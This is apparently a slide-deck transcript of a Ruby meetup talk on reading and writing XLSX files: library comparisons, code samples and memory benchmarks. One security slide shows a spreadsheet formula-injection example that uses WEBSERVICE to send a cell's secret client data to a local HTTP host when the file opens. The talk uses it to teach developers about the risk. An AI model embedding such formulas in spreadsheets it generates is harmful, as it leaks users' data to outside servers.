Upgrade to Pro — share decks privately, control downloads, hide ads and more …

XLSX in Ruby. RRUG #9

mrzasa
October 12, 2017
Programming
0
190

XLSX in Ruby. RRUG #9

Handling XLSX files in ruby - parsing, generating; efficiency and security.
Slides from presentation during Rzeszów Ruby User Group meetup.

mrzasa

October 12, 2017
Tweet

More Decks by mrzasa

See All by mrzasa
Debug Like a Scientist! Copenhagen Developers Festival 2024
mrzasa
1
44
API Optimization Tale: Monitor, Fix and Deploy (on Friday). GopherCon Europe 2023
mrzasa
0
56
API Optimization Tale: Monitor, Fix and Deploy (on Friday). RubyConf BR
mrzasa
0
21
API Optimization Tale: Monitor, Fix and Deploy (on Friday). RailsConf 2021
mrzasa
0
30
API Optimization Tale: Monitor, Fix and Deploy (on Friday). Italian Ruby Day
mrzasa
0
210
I Can Kill Your Browser With a Simple Regexp. Workshop
mrzasa
0
73
[PL] Kto to jest senior developer? - 4Developers 2019
mrzasa
0
130
[PL] (HackYeah) Nie ma nic prostszego niż napisanie wolnego regexpa
mrzasa
0
150
Writing slow regexp is easier than you think (and want it to be)
mrzasa
0
370

Other Decks in Programming

See All in Programming
Webの技術スタックで マルチプラットフォームアプリ開発を可能にするElixirDesktopの紹介
thehaigo
2
1k
subpath importsで始めるモック生活
10tera
0
300
Creating a Free Video Ad Network on the Edge
mizoguchicoji
0
120
TypeScript Graph でコードレビューの心理的障壁を乗り越える
ysk8hori
2
1.1k
Better Code Design in PHP
afilina
PRO
0
120
役立つログに取り組もう
irof
28
9.6k
色々なIaCツールを実際に触って比較してみる
iriikeita
0
330
macOS でできる リアルタイム動画像処理
biacco42
9
2.4k
Snowflake x dbtで作るセキュアでアジャイルなデータ基盤
tsoshiro
2
520
WebフロントエンドにおけるGraphQL(あるいはバックエンドのAPI)との向き合い方 / #241106_plk_frontend
izumin5210
4
1.4k
AWS IaCの注目アップデート 2024年10月版
konokenj
3
3.3k
ふかぼれ!CSSセレクターモジュール / Fukabore! CSS Selectors Module
petamoriken
0
150

Featured

See All Featured
A Modern Web Designer's Workflow
chriscoyier
693
190k
The Power of CSS Pseudo Elements
geoffreycrofte
73
5.3k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
126
18k
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
226
22k
Automating Front-end Workflow
addyosmani
1366
200k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.1k
The Cost Of JavaScript in 2023
addyosmani
45
6.7k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
280
13k
Put a Button on it: Removing Barriers to Going Fast.
kastner
59
3.5k
Building a Modern Day 
E-commerce SEO Strategy
aleyda
38
6.9k
Helping Users Find Their Own Way: Creating Modern Search Experiences
danielanewman
29
2.3k
Building an army of robots
kneath
302
43k

Transcript

  1. XLSX IN RUBY XLSX IN RUBY MACIEK RZĄSA, MACIEK RZĄSA,

    Rzeszów Ruby User Group, 12.10.2017 @MJRZASA @MJRZASA

  2. WHY XLSX? WHY XLSX?

  3. INTERNALS INTERNALS $ unzip -l 10-shared-true.xlsx Archive: 10-shared-true.xlsx Length Date

    Time Name --------- ---------- ----- ---- 1944 2017-10-12 01:07 xl/worksheets/sheet1.xml 313 2017-10-12 01:07 xl/workbook.xml 1090 2017-10-12 01:07 xl/styles.xml 1439 2017-10-12 01:07 xl/sharedStrings.xml 566 2017-10-12 01:07 xl/_rels/workbook.xml.rels 297 2017-10-12 01:07 _rels/.rels 817 2017-10-12 01:07 [Content_Types].xml --------- ------- 6466 7 files

  4. xl/worksheets/sheet1.xml

  5. PARSING PARSING roo creek rubyXL

  6. PARSING EXAMPLE PARSING EXAMPLE sheet = Roo::Excelx.new(path) sheet.cell(1,1) sheet.cell('A',1) sheet.cell(1,'A')

    sheet.a1 cells = sheet.sheet_for(sheet.sheets.first).cells data = sheet.header_line.upto(sheet.last_row).map do |row| [cells[[row, 1]]), cells[[row, 2]]] end

  7. PARSING PERFORMANCE PARSING PERFORMANCE source:spin.atomicobject.com

  8. GENERATING GENERATING axlsx xlsxtream

  9. AXLSX AXLSX Axlsx::Package.new.tap do |p| p.workbook.add_worksheet(name: 'Test') do |sheet| data.each

    do |row| sheet.add_row(row) end end p.use_shared_strings = true p.serialize(path) end

  10. XLSXTREAM XLSXTREAM Xlsxtream::Workbook.open(path, use_shared_strings: true) do |xlsx| xlsx.write_worksheet "Test" do

    |sheet| data.each do |row| sheet << row end end end

  11. PERFORMANCE PERFORMANCE

  12. None

  13. XLSX/CSV MEMORY XLSX/CSV MEMORY [csv]10 25847 allocated [csv]100 62069 allocated

    - 2.40x more [stream]10 77358 allocated - 2.99x more [stream]100 273694 allocated - 10.59x more [csv]1000 424315 allocated - 16.42x more [axlsx]10 527579 allocated - 20.41x more [axlsx]100 1528683 allocated - 59.14x more [stream]1000 1927186 allocated - 74.56x more [csv]10000 4046771 allocated - 156.57x more [axlsx]1000 11062251 allocated - 427.99x more [stream]10_000 17440784 allocated - 674.77x more [axlsx]10_000 104650749 allocated - 4048.85x more

  14. XLSX/CSV GENERATION TIME XLSX/CSV GENERATION TIME

  15. SECURITY SECURITY let's try it require 'axlsx' Axlsx::Package.new.tap do |p|

    p.workbook.add_worksheet(name: 'Test') do |s| s.add_row(['Secret client data']) s.add_row(['=1+2', '=WEBSERVICE(CONCAT ("http://localhost:4567/", "'", A1, "'"))' ]) end p.serialize('out/injection-axlsx.xlsx') end

  16. CAN WE AVOID USING XLSX? CAN WE AVOID USING XLSX?

  17. SOURCES SOURCES https://spin.atomicobject.com/2017/03/22/parsing-ex ruby/ https://stackover�ow.com/q/3321011/580346 https://stackover�ow.com/q/40804944/580346 https://pentestmag.com/formula-injection/ https://twitter.com/owickstrom/status/91766512471